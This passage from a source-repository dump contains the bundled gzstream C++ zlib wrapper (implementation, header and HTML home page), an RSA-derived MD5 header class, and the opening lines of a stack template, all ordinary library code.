the GNU Lesser General Public 7 | // License as published by the Free Software Foundation; either 8 | // version 2.1 of the License, or (at your option) any later version. 9 | // 10 | // This library is distributed in the hope that it will be useful, 11 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | // Lesser General Public License for more details. 14 | // 15 | // You should have received a copy of the GNU Lesser General Public 16 | // License along with this library; if not, write to the Free Software 17 | // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | // ============================================================================ 19 | // 20 | // File : gzstream.C 21 | // Revision : $Revision: 1.7 $ 22 | // Revision_date : $Date: 2003/01/08 14:41:27 $ 23 | // Author(s) : Deepak Bandyopadhyay, Lutz Kettner 24 | // 25 | // Standard streambuf implementation following Nicolai Josuttis, "The 26 | // Standard C++ Library". 27 | // ============================================================================ 28 | 29 | #ifdef __KALI__ 30 | #include "./gzstream.h" 31 | #else 32 | #include "include/gzstream/gzstream.h" 33 | #endif 34 | #include <iostream> 35 | #include <string.h> // for memcpy 36 | 37 | #ifdef GZSTREAM_NAMESPACE 38 | namespace GZSTREAM_NAMESPACE { 39 | #endif 40 | 41 | // ---------------------------------------------------------------------------- 42 | // Internal classes to implement gzstream. See header file for user classes. 43 | // ---------------------------------------------------------------------------- 44 | 45 | // -------------------------------------- 46 | // class gzstreambuf: 47 | // -------------------------------------- 48 | 49 | gzstreambuf* gzstreambuf::open( const char* name, int open_mode) { 50 | if ( is_open()) 51 | return (gzstreambuf*)0; 52 | mode = open_mode; 53 | // no append nor read/write mode 54 | if ((mode & std::ios::ate) || (mode & std::ios::app) 55 | || ((mode & std::ios::in) && (mode & std::ios::out))) 56 | return (gzstreambuf*)0; 57 | char fmode[10]; 58 | char* fmodeptr = fmode; 59 | if ( mode & std::ios::in) 60 | *fmodeptr++ = 'r'; 61 | else if ( mode & std::ios::out) 62 | *fmodeptr++ = 'w'; 63 | *fmodeptr++ = 'b'; 64 | *fmodeptr = '\0'; 65 | file = gzopen( name, fmode); 66 | if (file == 0) 67 | return (gzstreambuf*)0; 68 | opened = 1; 69 | return this; 70 | } 71 | 72 | gzstreambuf * gzstreambuf::close() { 73 | if ( is_open()) { 74 | sync(); 75 | opened = 0; 76 | if ( gzclose( file) == Z_OK) 77 | return this; 78 | } 79 | return (gzstreambuf*)0; 80 | } 81 | 82 | int gzstreambuf::underflow() { // used for input buffer only 83 | if ( gptr() && ( gptr() < egptr())) 84 | return * reinterpret_cast<unsigned char *>( gptr()); 85 | 86 | if ( ! (mode & std::ios::in) || ! opened) 87 | return EOF; 88 | // Josuttis' implementation of inbuf 89 | int n_putback = gptr() - eback(); 90 | if ( n_putback > 4) 91 | n_putback = 4; 92 | memcpy( buffer + (4 - n_putback), gptr() - n_putback, n_putback); 93 | 94 | int num = gzread( file, buffer+4, bufferSize-4); 95 | if (num <= 0) // ERROR or EOF 96 | return EOF; 97 | 98 | // reset buffer pointers 99 | setg( buffer + (4 - n_putback), // beginning of putback area 100 | buffer + 4, // read position 101 | buffer + 4 + num); // end of buffer 102 | 103 | // return next character 104 | return * reinterpret_cast<unsigned char *>( gptr()); 105 | } 106 | 107 | int gzstreambuf::flush_buffer() { 108 | // Separate the writing of the buffer from overflow() and 109 | // sync() operation. 110 | int w = pptr() - pbase(); 111 | if ( gzwrite( file, pbase(), w) != w) 112 | return EOF; 113 | pbump( -w); 114 | return w; 115 | } 116 | 117 | int gzstreambuf::overflow( int c) { // used for output buffer only 118 | if ( ! ( mode & std::ios::out) || ! opened) 119 | return EOF; 120 | if (c != EOF) { 121 | *pptr() = c; 122 | pbump(1); 123 | } 124 | if ( flush_buffer() == EOF) 125 | return EOF; 126 | return c; 127 | } 128 | 129 | int gzstreambuf::sync() { 130 | // Changed to use flush_buffer() instead of overflow( EOF) 131 | // which caused improper behavior with std::endl and flush(), 132 | // bug reported by Vincent Ricard. 133 | if ( pptr() && pptr() > pbase()) { 134 | if ( flush_buffer() == EOF) 135 | return -1; 136 | } 137 | return 0; 138 | } 139 | 140 | // -------------------------------------- 141 | // class gzstreambase: 142 | // -------------------------------------- 143 | 144 | gzstreambase::gzstreambase( const char* name, int mode) { 145 | init( &buf); 146 | open( name, mode); 147 | } 148 | 149 | gzstreambase::~gzstreambase() { 150 | buf.close(); 151 | } 152 | 153 | void gzstreambase::open( const char* name, int open_mode) { 154 | if ( ! buf.open( name, open_mode)) 155 | clear( rdstate() | std::ios::badbit); 156 | } 157 | 158 | void gzstreambase::close() { 159 | if ( buf.is_open()) 160 | if ( ! buf.close()) 161 | clear( rdstate() | std::ios::badbit); 162 | } 163 | 164 | #ifdef GZSTREAM_NAMESPACE 165 | } // namespace GZSTREAM_NAMESPACE 166 | #endif 167 | 168 | // ============================================================================ 169 | // EOF // 170 | -------------------------------------------------------------------------------- /include/gzstream/gzstream.h: -------------------------------------------------------------------------------- 1 | // ============================================================================ 2 | // gzstream, C++ iostream classes wrapping the zlib compression library. 3 | // Copyright (C) 2001 Deepak Bandyopadhyay, Lutz Kettner 4 | // 5 | // This library is free software; you can redistribute it and/or 6 | // modify it under the terms of the GNU Lesser General Public 7 | // License as published by the Free Software Foundation; either 8 | // version 2.1 of the License, or (at your option) any later version. 9 | // 10 | // This library is distributed in the hope that it will be useful, 11 | // but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | // MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | // Lesser General Public License for more details. 14 | // 15 | // You should have received a copy of the GNU Lesser General Public 16 | // License along with this library; if not, write to the Free Software 17 | // Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA 18 | // ============================================================================ 19 | // 20 | // File : gzstream.h 21 | // Revision : $Revision: 1.5 $ 22 | // Revision_date : $Date: 2002/04/26 23:30:15 $ 23 | // Author(s) : Deepak Bandyopadhyay, Lutz Kettner 24 | // 25 | // Standard streambuf implementation following Nicolai Josuttis, "The 26 | // Standard C++ Library". 27 | // ============================================================================ 28 | 29 | #ifndef GZSTREAM_H 30 | #define GZSTREAM_H 1 31 | 32 | // standard C++ with new header file names and std:: namespace 33 | #include <iostream> 34 | #include <fstream> 35 | #include <zlib.h> 36 | 37 | #ifdef GZSTREAM_NAMESPACE 38 | namespace GZSTREAM_NAMESPACE { 39 | #endif 40 | 41 | // ---------------------------------------------------------------------------- 42 | // Internal classes to implement gzstream. See below for user classes. 43 | // ---------------------------------------------------------------------------- 44 | 45 | class gzstreambuf : public std::streambuf { 46 | private: 47 | static const int bufferSize = 47+256; // size of data buff 48 | // totals 512 bytes under g++ for igzstream at the end. 49 | 50 | gzFile file; // file handle for compressed file 51 | char buffer[bufferSize]; // data buffer 52 | char opened; // open/close state of stream 53 | int mode; // I/O mode 54 | 55 | int flush_buffer(); 56 | public: 57 | gzstreambuf() : opened(0) { 58 | setp( buffer, buffer + (bufferSize-1)); 59 | setg( buffer + 4, // beginning of putback area 60 | buffer + 4, // read position 61 | buffer + 4); // end position 62 | // ASSERT: both input & output capabilities will not be used together 63 | } 64 | int is_open() { return opened; } 65 | gzstreambuf* open( const char* name, int open_mode); 66 | gzstreambuf* close(); 67 | ~gzstreambuf() { close(); } 68 | 69 | virtual int overflow( int c = EOF); 70 | virtual int underflow(); 71 | virtual int sync(); 72 | }; 73 | 74 | class gzstreambase : virtual public std::ios { 75 | protected: 76 | gzstreambuf buf; 77 | public: 78 | gzstreambase() { init(&buf); } 79 | gzstreambase( const char* name, int open_mode); 80 | ~gzstreambase(); 81 | void open( const char* name, int open_mode); 82 | void close(); 83 | gzstreambuf* rdbuf() { return &buf; } 84 | }; 85 | 86 | // ---------------------------------------------------------------------------- 87 | // User classes. Use igzstream and ogzstream analogously to ifstream and 88 | // ofstream respectively. They read and write files based on the gz* 89 | // function interface of the zlib. Files are compatible with gzip compression. 90 | // ---------------------------------------------------------------------------- 91 | 92 | class igzstream : public gzstreambase, public std::istream { 93 | public: 94 | igzstream() : std::istream( &buf) {} 95 | igzstream( const char* name, int open_mode = std::ios::in) 96 | : gzstreambase( name, open_mode), std::istream( &buf) {} 97 | gzstreambuf* rdbuf() { return gzstreambase::rdbuf(); } 98 | void open( const char* name, int open_mode = std::ios::in) { 99 | gzstreambase::open( name, open_mode); 100 | } 101 | }; 102 | 103 | class ogzstream : public gzstreambase, public std::ostream { 104 | public: 105 | ogzstream() : std::ostream( &buf) {} 106 | ogzstream( const char* name, int mode = std::ios::out) 107 | : gzstreambase( name, mode), std::ostream( &buf) {} 108 | gzstreambuf* rdbuf() { return gzstreambase::rdbuf(); } 109 | void open( const char* name, int open_mode = std::ios::out) { 110 | gzstreambase::open( name, open_mode); 111 | } 112 | }; 113 | 114 | #ifdef GZSTREAM_NAMESPACE 115 | } // namespace GZSTREAM_NAMESPACE 116 | #endif 117 | 118 | #endif // GZSTREAM_H 119 | // ============================================================================ 120 | // EOF // 121 | 122 | -------------------------------------------------------------------------------- /include/gzstream/index.html: -------------------------------------------------------------------------------- 1 | <html> <head> 2 | <title>Gzstream Library Home Page</title> 3 | </head> 4 | <body BGCOLOR="FAF8E8" TEXT="#000000"> 5 | 6 | <h1>Gzstream Library Home Page</h1> 7 | 8 | <hr> 9 | <TABLE><TR><TD ALIGN=LEFT VALIGN=TOP> 10 | <img border=0 src="logo.gif" align=center> 11 | </TD><TD ALIGN=LEFT VALIGN=TOP NOWRAP> 12 | <ul> 13 | <li><a href="#intro"> Introduction</a> 14 | <li><a href="#sys"> Supported Systems</a> 15 | <li><a href="#inst"> Installation</a> 16 | <li><a href="#doc"> Documentation</a> 17 | <li><a href="#miss"> What's Missing</a> 18 | <li><a href="#src"> Download</a> 19 | <li><a href="#links"> Links</a><P> 20 | </ul> 21 | </TD></TR></TABLE> 22 | 23 | 24 | <hr><!--------------------------------------------------------------------> 25 | <a name="intro"><h2> Introduction </h2></a> 26 | 27 | <i>Gzstream</i> is a small C++ library, basically just a wrapper, 28 | that provides the functionality of the 29 | <a href="http://www.gzip.org/zlib/">zlib C-library</a> in a C++ iostream. 30 | It is freely available under the <a href="COPYING.LIB">LGPL license</a>.<P> 31 | 32 | Gzstream has been written by 33 | <a href="http://www.cs.unc.edu/~debug/">Deepak Bandyopadhyay</a> and 34 | <a href="http://www.cs.unc.edu/~kettner/">Lutz Kettner</a> at 35 | the <a href="http://www.cs.unc.edu/Research/compgeom/">Computational 36 | Geometry Group at UNC Chapel Hill</a>.<P> 37 | 38 | 39 | <hr><!--------------------------------------------------------------------> 40 | <a name="sys"><h2> Supported Systems </h2></a> 41 | 42 | Gzstream requires a standard compliant C++ compiler (we use the new 43 | header file conventions and the new iostream in the std:: name space) 44 | and, of course, zlib. We used zlib 1.1.3 so far, but see the <a 45 | href="http://www.gzip.org/zlib/">zlib home page</a> for why you should 46 | upgrade to zlib 1.1.4. So, in theory, the provided sources could run 47 | on many platforms. However, we used only the following few 48 | platforms.<P> 49 | <P> 50 | 51 | <ul> 52 | <li> PC Linux, RedHat 6.1, g++ version 2.95.2 53 | <li> PC Linux, Debian, g++ version 2.95.2 and 3.1 54 | <li> SGI Irix 6.5, MIPSpro CC version 7.30 55 | </ul><P> 56 | 57 | 58 | <hr><!--------------------------------------------------------------------> 59 | <a name="inst"><h2> Installation </h2></a> 60 | 61 | Either compile <tt>gzstream.C</tt> by hand, place it in some library, 62 | and move <tt>gzstream.h</tt> into the include search path of your 63 | compiler. Or use the provided <tt>Makefile</tt>, adapt its 64 | variables, and follow the remarks in the <tt>Makefile</tt>. Two 65 | test programs are provided, <tt>test_gzip.C</tt> and <tt>test_gunzip.C</tt>. 66 | The <tt>Makefile</tt> contains a rule that performs a small test 67 | with these programs.<P> 68 | 69 | 70 | <hr><!--------------------------------------------------------------------> 71 | <a name="doc"><h2> Documentation </h2></a> 72 | 73 | The library provides two classes, <tt>igzstream</tt> and <tt>ogzstream</tt>, 74 | that can be used analogously to <tt>ifstream</tt> and <tt>ofstream</tt> 75 | respectively.<P> 76 | 77 | The classes are by default in the global name space. This can 78 | be changed by setting the macro <tt>GZSTREAM_NAMESPACE</tt> to 79 | the desired name space, e.g., by setting the option 80 | </tt>-DGZSTREAM_NAMESPACE=gz</tt> in the <tt>Makefile</tt>. 81 | However, this needs to be consistent for both, the library compilation 82 | and the application that uses the library.<P> 83 | 84 | 85 | <hr><!--------------------------------------------------------------------> 86 | <a name="miss"><h2> What's Missing </h2></a> 87 | 88 | <ul> 89 | <li> Seek. The zlib library provides the necessary functionality, 90 | but we have not realized that in the wrapper (yet? ;-). 91 | <li> Both streams are based on the same streambuffer. So, they 92 | cannot be used to derive an iogzstream class that would allow 93 | simultaneous reading and writing to the same file. 94 | </ul><P> 95 | 96 | 97 | <hr><!--------------------------------------------------------------------> 98 | <a name="src"><h2> Download and Release Notes</h2></a> 99 | 100 | <ul> 101 | <li> Gzstream library 1.5 (08 Apr 2003): 102 | <a href="gzstream.tgz">gzstream.tgz</a><br> 103 | Fixed bug that did not set the state correctly on failure to open or 104 | close a file. <br> 105 | Fixed bug in the indexing of the write buffer that 106 | caused the write buffer to shrink continously and finally caused 107 | wrong results when writing compressed files (only observed on some 108 | platforms). <P> 109 | <li> Gzstream library 1.4 (27 Apr 2002):<br> 110 | Fixed a bug that stopped stream output after calling <tt>flush()</tt> 111 | or using <tt>std::endl</tt>.<P> 112 | <li> Gzstream library 1.3 (06 Nov 2001):<br> 113 | Fixed unsigned char -- signed char bug. Increased buffer size 114 | for better performance.<P> 115 | <li> Gzstream library 1.2 (04 Oct 2001):<br> 116 | Initial release as gzstream, renamed from zipstream.<P> 117 | <li> Zipstream library 1.1 (09 Sep 2001):<br> 118 | Initial release. 119 | </ul> 120 | 121 | <hr><!--------------------------------------------------------------------> 122 | <a name="links"><h2> Acknowledgements </h2></a> 123 | 124 | Credits for finding bugs and improving this software go to: 125 | Vincent Ricard, Peter Milley, Peter J. Torelli, and Ares Lagae. 126 | <P> 127 | 128 | <hr><!--------------------------------------------------------------------> 129 | <a name="links"><h2> Links </h2></a> 130 | 131 | <ul> 132 | <li><a href="http://www.gzip.org/zlib/">zlib C-library</a> 133 | <li><a href="http://www.cs.unc.edu/~debug/">Deepak Bandyopadhyay</a> 134 | <li><a href="http://www.cs.unc.edu/~kettner/">Lutz Kettner</a> 135 | <li><a href="http://www.cs.unc.edu/Research/compgeom/"> 136 | The Computational Geometry Group at UNC Chapel Hill</a> 137 | </ul> 138 | 139 | <hr><!--------------------------------------------------------------------> 140 | <address> 141 | The Computational Geometry Group at UNC Chapel Hill, Jan. 08, 2003. 142 | </address> 143 | </body> </html> 144 | <!--------------------------------------------------------------------> 145 | <!EOF> 146 | -------------------------------------------------------------------------------- /include/gzstream/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/oxagast/ansvif/49aaeb533547094018e123981826dc3970562335/include/gzstream/logo.gif -------------------------------------------------------------------------------- /include/gzstream/version: -------------------------------------------------------------------------------- 1 | 1.5 (08 Jan 2003) 2 | -------------------------------------------------------------------------------- /include/md5.h: -------------------------------------------------------------------------------- 1 | #ifndef MD5_H 2 | #define MD5_H 3 | 4 | // Copyright (C) 1991-2, RSA Data Security, Inc. Created 1991. All 5 | // rights reserved. 6 | 7 | // License to copy and use this software is granted provided that it 8 | // is identified as the "RSA Data Security, Inc. MD5 Message-Digest 9 | // Algorithm" in all material mentioning or referencing this software 10 | // or this function. 11 | // 12 | // License is also granted to make and use derivative works provided 13 | // that such works are identified as "derived from the RSA Data 14 | // Security, Inc. MD5 Message-Digest Algorithm" in all material 15 | // mentioning or referencing the derived work. 16 | // 17 | // RSA Data Security, Inc. makes no representations concerning either 18 | // the merchantability of this software or the suitability of this 19 | // software for any particular purpose. It is provided "as is" 20 | // without express or implied warranty of any kind. 21 | // 22 | // These notices must be retained in any copies of any part of this 23 | // documentation and/or software. 24 | 25 | 26 | 27 | // The original md5 implementation avoids external libraries. 28 | // This version has dependency on stdio.h for file input and 29 | // string.h for memcpy. 30 | #include <stdio.h> 31 | #include <string.h> 32 | 33 | //#pragma region MD5 defines 34 | // Constants for MD5Transform routine. 35 | #define S11 7 36 | #define S12 12 37 | #define S13 17 38 | #define S14 22 39 | #define S21 5 40 | #define S22 9 41 | #define S23 14 42 | #define S24 20 43 | #define S31 4 44 | #define S32 11 45 | #define S33 16 46 | #define S34 23 47 | #define S41 6 48 | #define S42 10 49 | #define S43 15 50 | #define S44 21 51 | 52 | 53 | 54 | 55 | 56 | 57 | static unsigned char PADDING[64] = { 58 | 0x80, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 59 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 60 | 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 61 | }; 62 | 63 | // F, G, H and I are basic MD5 functions. 64 | #define F(x, y, z) (((x) & (y)) | ((~x) & (z))) 65 | #define G(x, y, z) (((x) & (z)) | ((y) & (~z))) 66 | #define H(x, y, z) ((x) ^ (y) ^ (z)) 67 | #define I(x, y, z) ((y) ^ ((x) | (~z))) 68 | 69 | // ROTATE_LEFT rotates x left n bits. 70 | #define ROTATE_LEFT(x, n) (((x) << (n)) | ((x) >> (32-(n)))) 71 | 72 | // FF, GG, HH, and II transformations for rounds 1, 2, 3, and 4. 73 | // Rotation is separate from addition to prevent recomputation. 74 | #define FF(a, b, c, d, x, s, ac) { \ 75 | (a) += F ((b), (c), (d)) + (x) + (UINT4)(ac); \ 76 | (a) = ROTATE_LEFT ((a), (s)); \ 77 | (a) += (b); \ 78 | } 79 | #define GG(a, b, c, d, x, s, ac) { \ 80 | (a) += G ((b), (c), (d)) + (x) + (UINT4)(ac); \ 81 | (a) = ROTATE_LEFT ((a), (s)); \ 82 | (a) += (b); \ 83 | } 84 | #define HH(a, b, c, d, x, s, ac) { \ 85 | (a) += H ((b), (c), (d)) + (x) + (UINT4)(ac); \ 86 | (a) = ROTATE_LEFT ((a), (s)); \ 87 | (a) += (b); \ 88 | } 89 | #define II(a, b, c, d, x, s, ac) { \ 90 | (a) += I ((b), (c), (d)) + (x) + (UINT4)(ac); \ 91 | (a) = ROTATE_LEFT ((a), (s)); \ 92 | (a) += (b); \ 93 | } 94 | //#pragma endregion 95 | 96 | typedef unsigned char BYTE ; 97 | 98 | // POINTER defines a generic pointer type 99 | typedef unsigned char *POINTER; 100 | 101 | // UINT2 defines a two byte word 102 | typedef unsigned short int UINT2; 103 | 104 | // UINT4 defines a four byte word 105 | typedef unsigned long int UINT4; 106 | 107 | 108 | // convenient object that wraps 109 | // the C-functions for use in C++ only 110 | class MD5 111 | { 112 | private: 113 | struct __context_t { 114 | UINT4 state[4]; /* state (ABCD) */ 115 | UINT4 count[2]; /* number of bits, modulo 2^64 (lsb first) */ 116 | unsigned char buffer[64]; /* input buffer */ 117 | } context ; 118 | 119 | // #pragma region static helper functions 120 | // The core of the MD5 algorithm is here. 121 | // MD5 basic transformation. Transforms state based on block. 122 | static void MD5Transform( UINT4 state[4], unsigned char block[64] ) 123 | { 124 | UINT4 a = state[0], b = state[1], c = state[2], d = state[3], x[16]; 125 | 126 | Decode (x, block, 64); 127 | 128 | /* Round 1 */ 129 | FF (a, b, c, d, x[ 0], S11, 0xd76aa478); /* 1 */ 130 | FF (d, a, b, c, x[ 1], S12, 0xe8c7b756); /* 2 */ 131 | FF (c, d, a, b, x[ 2], S13, 0x242070db); /* 3 */ 132 | FF (b, c, d, a, x[ 3], S14, 0xc1bdceee); /* 4 */ 133 | FF (a, b, c, d, x[ 4], S11, 0xf57c0faf); /* 5 */ 134 | FF (d, a, b, c, x[ 5], S12, 0x4787c62a); /* 6 */ 135 | FF (c, d, a, b, x[ 6], S13, 0xa8304613); /* 7 */ 136 | FF (b, c, d, a, x[ 7], S14, 0xfd469501); /* 8 */ 137 | FF (a, b, c, d, x[ 8], S11, 0x698098d8); /* 9 */ 138 | FF (d, a, b, c, x[ 9], S12, 0x8b44f7af); /* 10 */ 139 | FF (c, d, a, b, x[10], S13, 0xffff5bb1); /* 11 */ 140 | FF (b, c, d, a, x[11], S14, 0x895cd7be); /* 12 */ 141 | FF (a, b, c, d, x[12], S11, 0x6b901122); /* 13 */ 142 | FF (d, a, b, c, x[13], S12, 0xfd987193); /* 14 */ 143 | FF (c, d, a, b, x[14], S13, 0xa679438e); /* 15 */ 144 | FF (b, c, d, a, x[15], S14, 0x49b40821); /* 16 */ 145 | 146 | /* Round 2 */ 147 | GG (a, b, c, d, x[ 1], S21, 0xf61e2562); /* 17 */ 148 | GG (d, a, b, c, x[ 6], S22, 0xc040b340); /* 18 */ 149 | GG (c, d, a, b, x[11], S23, 0x265e5a51); /* 19 */ 150 | GG (b, c, d, a, x[ 0], S24, 0xe9b6c7aa); /* 20 */ 151 | GG (a, b, c, d, x[ 5], S21, 0xd62f105d); /* 21 */ 152 | GG (d, a, b, c, x[10], S22, 0x2441453); /* 22 */ 153 | GG (c, d, a, b, x[15], S23, 0xd8a1e681); /* 23 */ 154 | GG (b, c, d, a, x[ 4], S24, 0xe7d3fbc8); /* 24 */ 155 | GG (a, b, c, d, x[ 9], S21, 0x21e1cde6); /* 25 */ 156 | GG (d, a, b, c, x[14], S22, 0xc33707d6); /* 26 */ 157 | GG (c, d, a, b, x[ 3], S23, 0xf4d50d87); /* 27 */ 158 | GG (b, c, d, a, x[ 8], S24, 0x455a14ed); /* 28 */ 159 | GG (a, b, c, d, x[13], S21, 0xa9e3e905); /* 29 */ 160 | GG (d, a, b, c, x[ 2], S22, 0xfcefa3f8); /* 30 */ 161 | GG (c, d, a, b, x[ 7], S23, 0x676f02d9); /* 31 */ 162 | GG (b, c, d, a, x[12], S24, 0x8d2a4c8a); /* 32 */ 163 | 164 | /* Round 3 */ 165 | HH (a, b, c, d, x[ 5], S31, 0xfffa3942); /* 33 */ 166 | HH (d, a, b, c, x[ 8], S32, 0x8771f681); /* 34 */ 167 | HH (c, d, a, b, x[11], S33, 0x6d9d6122); /* 35 */ 168 | HH (b, c, d, a, x[14], S34, 0xfde5380c); /* 36 */ 169 | HH (a, b, c, d, x[ 1], S31, 0xa4beea44); /* 37 */ 170 | HH (d, a, b, c, x[ 4], S32, 0x4bdecfa9); /* 38 */ 171 | HH (c, d, a, b, x[ 7], S33, 0xf6bb4b60); /* 39 */ 172 | HH (b, c, d, a, x[10], S34, 0xbebfbc70); /* 40 */ 173 | HH (a, b, c, d, x[13], S31, 0x289b7ec6); /* 41 */ 174 | HH (d, a, b, c, x[ 0], S32, 0xeaa127fa); /* 42 */ 175 | HH (c, d, a, b, x[ 3], S33, 0xd4ef3085); /* 43 */ 176 | HH (b, c, d, a, x[ 6], S34, 0x4881d05); /* 44 */ 177 | HH (a, b, c, d, x[ 9], S31, 0xd9d4d039); /* 45 */ 178 | HH (d, a, b, c, x[12], S32, 0xe6db99e5); /* 46 */ 179 | HH (c, d, a, b, x[15], S33, 0x1fa27cf8); /* 47 */ 180 | HH (b, c, d, a, x[ 2], S34, 0xc4ac5665); /* 48 */ 181 | 182 | /* Round 4 */ 183 | II (a, b, c, d, x[ 0], S41, 0xf4292244); /* 49 */ 184 | II (d, a, b, c, x[ 7], S42, 0x432aff97); /* 50 */ 185 | II (c, d, a, b, x[14], S43, 0xab9423a7); /* 51 */ 186 | II (b, c, d, a, x[ 5], S44, 0xfc93a039); /* 52 */ 187 | II (a, b, c, d, x[12], S41, 0x655b59c3); /* 53 */ 188 | II (d, a, b, c, x[ 3], S42, 0x8f0ccc92); /* 54 */ 189 | II (c, d, a, b, x[10], S43, 0xffeff47d); /* 55 */ 190 | II (b, c, d, a, x[ 1], S44, 0x85845dd1); /* 56 */ 191 | II (a, b, c, d, x[ 8], S41, 0x6fa87e4f); /* 57 */ 192 | II (d, a, b, c, x[15], S42, 0xfe2ce6e0); /* 58 */ 193 | II (c, d, a, b, x[ 6], S43, 0xa3014314); /* 59 */ 194 | II (b, c, d, a, x[13], S44, 0x4e0811a1); /* 60 */ 195 | II (a, b, c, d, x[ 4], S41, 0xf7537e82); /* 61 */ 196 | II (d, a, b, c, x[11], S42, 0xbd3af235); /* 62 */ 197 | II (c, d, a, b, x[ 2], S43, 0x2ad7d2bb); /* 63 */ 198 | II (b, c, d, a, x[ 9], S44, 0xeb86d391); /* 64 */ 199 | 200 | state[0] += a; 201 | state[1] += b; 202 | state[2] += c; 203 | state[3] += d; 204 | 205 | // Zeroize sensitive information. 206 | memset((POINTER)x, 0, sizeof (x)); 207 | } 208 | 209 | // Encodes input (UINT4) into output (unsigned char). Assumes len is 210 | // a multiple of 4. 211 | static void Encode( unsigned char *output, UINT4 *input, unsigned int len ) 212 | { 213 | unsigned int i, j; 214 | 215 | for (i = 0, j = 0; j < len; i++, j += 4) { 216 | output[j] = (unsigned char)(input[i] & 0xff); 217 | output[j+1] = (unsigned char)((input[i] >> 8) & 0xff); 218 | output[j+2] = (unsigned char)((input[i] >> 16) & 0xff); 219 | output[j+3] = (unsigned char)((input[i] >> 24) & 0xff); 220 | } 221 | } 222 | 223 | // Decodes input (unsigned char) into output (UINT4). Assumes len is 224 | // a multiple of 4. 225 | static void Decode( UINT4 *output, unsigned char *input, unsigned int len ) 226 | { 227 | unsigned int i, j; 228 | 229 | for (i = 0, j = 0; j < len; i++, j += 4) 230 | output[i] = ((UINT4)input[j]) | (((UINT4)input[j+1]) << 8) | 231 | (((UINT4)input[j+2]) << 16) | (((UINT4)input[j+3]) << 24); 232 | } 233 | // #pragma endregion 234 | 235 | 236 | public: 237 | // MAIN FUNCTIONS 238 | MD5() 239 | { 240 | Init() ; 241 | } 242 | 243 | // MD5 initialization. Begins an MD5 operation, writing a new context. 244 | void Init() 245 | { 246 | context.count[0] = context.count[1] = 0; 247 | 248 | // Load magic initialization constants. 249 | context.state[0] = 0x67452301; 250 | context.state[1] = 0xefcdab89; 251 | context.state[2] = 0x98badcfe; 252 | context.state[3] = 0x10325476; 253 | } 254 | 255 | // MD5 block update operation. Continues an MD5 message-digest 256 | // operation, processing another message block, and updating the 257 | // context. 258 | void Update( 259 | unsigned char *input, // input block 260 | unsigned int inputLen ) // length of input block 261 | { 262 | unsigned int i, index, partLen; 263 | 264 | // Compute number of bytes mod 64 265 | index = (unsigned int)((context.count[0] >> 3) & 0x3F); 266 | 267 | // Update number of bits 268 | if ((context.count[0] += ((UINT4)inputLen << 3)) 269 | < ((UINT4)inputLen << 3)) 270 | context.count[1]++; 271 | context.count[1] += ((UINT4)inputLen >> 29); 272 | 273 | partLen = 64 - index; 274 | 275 | // Transform as many times as possible. 276 | if (inputLen >= partLen) { 277 | memcpy((POINTER)&context.buffer[index], (POINTER)input, partLen); 278 | MD5Transform (context.state, context.buffer); 279 | 280 | for (i = partLen; i + 63 < inputLen; i += 64) 281 | MD5Transform (context.state, &input[i]); 282 | 283 | index = 0; 284 | } 285 | else 286 | i = 0; 287 | 288 | /* Buffer remaining input */ 289 | memcpy((POINTER)&context.buffer[index], (POINTER)&input[i], inputLen-i); 290 | } 291 | 292 | // MD5 finalization. Ends an MD5 message-digest operation, writing the 293 | // the message digest and zeroizing the context. 294 | // Writes to digestRaw 295 | void Final() 296 | { 297 | unsigned char bits[8]; 298 | unsigned int index, padLen; 299 | 300 | // Save number of bits 301 | Encode( bits, context.count, 8 ); 302 | 303 | // Pad out to 56 mod 64. 304 | index = (unsigned int)((context.count[0] >> 3) & 0x3f); 305 | padLen = (index < 56) ? (56 - index) : (120 - index); 306 | Update( PADDING, padLen ); 307 | 308 | // Append length (before padding) 309 | Update( bits, 8 ); 310 | 311 | // Store state in digest 312 | Encode( digestRaw, context.state, 16); 313 | 314 | // Zeroize sensitive information. 315 | memset((POINTER)&context, 0, sizeof (context)); 316 | 317 | writeToString() ; 318 | } 319 | 320 | /// Buffer must be 32+1 (nul) = 33 chars long at least 321 | void writeToString() 322 | { 323 | int pos ; 324 | 325 | for( pos = 0 ; pos < 16 ; pos++ ) 326 | sprintf( digestChars+(pos*2), "%02x", digestRaw[pos] ) ; 327 | } 328 | 329 | 330 | public: 331 | // an MD5 digest is a 16-byte number (32 hex digits) 332 | BYTE digestRaw[ 16 ] ; 333 | 334 | // This version of the digest is actually 335 | // a "printf'd" version of the digest. 336 | char digestChars[ 33 ] ; 337 | 338 | /// Load a file from disk and digest it 339 | // Digests a file and returns the result. 340 | char* digestFile( char *filename ) 341 | { 342 | Init() ; 343 | 344 | FILE *file; 345 | 346 | int len; 347 | unsigned char buffer[1024] ; 348 | 349 | if( (file = fopen (filename, "rb")) == NULL ) 350 | printf( "%s can't be opened\n", filename ) ; 351 | else 352 | { 353 | while( (len = fread( buffer, 1, 1024, file ) ) ) 354 | Update( buffer, len ) ; 355 | Final(); 356 | 357 | fclose( file ); 358 | } 359 | 360 | return digestChars ; 361 | } 362 | 363 | /// Digests a byte-array already in memory 364 | char* digestMemory( BYTE *memchunk, int len ) 365 | { 366 | Init() ; 367 | Update( memchunk, len ) ; 368 | Final() ; 369 | 370 | return digestChars ; 371 | } 372 | 373 | // Digests a string and prints the result. 374 | char* digestString( char *string ) 375 | { 376 | Init() ; 377 | Update( (unsigned char*)string, strlen(string) ) ; 378 | Final() ; 379 | 380 | return digestChars ; 381 | } 382 | } ; 383 | 384 | #endif 385 | -------------------------------------------------------------------------------- /include/stack.h: -------------------------------------------------------------------------------- 1 | /* ************************************************************ 2 | * Stack.hpp 3 | * - safer and more convenient stack class 4 | * ************************************************************/ 5 | #ifndef STACK_HPP 6 | #define STACK_HPP 7 | 8 | #include <deque> 9 | #include <exception> 10 | 11 | template <class T> 12 | class stack { 13 